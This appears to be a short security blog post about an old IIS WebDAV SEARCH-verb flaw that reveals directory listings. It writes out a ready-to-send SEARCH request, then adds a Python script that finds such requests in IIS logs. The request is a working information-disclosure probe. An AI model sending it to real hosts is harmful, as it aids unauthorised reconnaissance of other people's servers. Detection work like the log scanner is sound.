IIS Search Verb Directory Listing

The vulnerability described at http://www.securityfocus.com/bid/1756 is old, but it still works on vulnerable hosts and is very useful.

Send this:

```http
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133

<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
```

And expect something like this back:

[Image: /images/postimages/201108_iis_1.png]
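To find this request in server logs, the following added example (not part of the original page) scans IIS W3C extended log lines for the `SEARCH` verb and notes which clients got an answer. The log lines are constructed, the function names are hypothetical, and treating a 207 Multi-Status reply as a disclosed listing is an assumption.

```python
# Constructed sample of an IIS W3C extended log (not taken from a real host).
SAMPLE_LOG = """\
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2011-08-01 10:00:01 192.0.2.10 GET /default.htm 200
2011-08-01 10:00:05 192.0.2.77 SEARCH / 207
2011-08-01 10:00:12 198.51.100.4 SEARCH / 501
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2011-08-01 10:05:00 PROPFIND / 192.0.2.10 207
2011-08-01 10:05:03 SEARCH /private/ 203.0.113.9 207
"""

def find_search_requests(lines):
    """Yield one dict per SEARCH request found in W3C extended log lines.

    Column order is taken from each '#Fields:' directive, because the logged
    fields are configurable and the directive can reappear mid-file.
    """
    fields = []
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated entry
        row = dict(zip(fields, values))
        if row.get("cs-method") != "SEARCH":
            continue
        yield {
            "client": row.get("c-ip", "-"),
            "uri": row.get("cs-uri-stem", "-"),
            "status": row.get("sc-status", "-"),
            # Assumption: 207 Multi-Status means the query was answered.
            "listing_returned": row.get("sc-status") == "207",
        }

def summarize(lines):
    """Return (all SEARCH hits, sorted clients that received a 207)."""
    hits = list(find_search_requests(lines))
    return hits, sorted({h["client"] for h in hits if h["listing_returned"]})

if __name__ == "__main__":
    hits, clients = summarize(SAMPLE_LOG.splitlines())
    print(*hits, sep="\n")
    print("clients that received a listing:", clients)
```

On a host that has no need for WebDAV searching, any `SEARCH` entry at all is worth reviewing, whatever the status code.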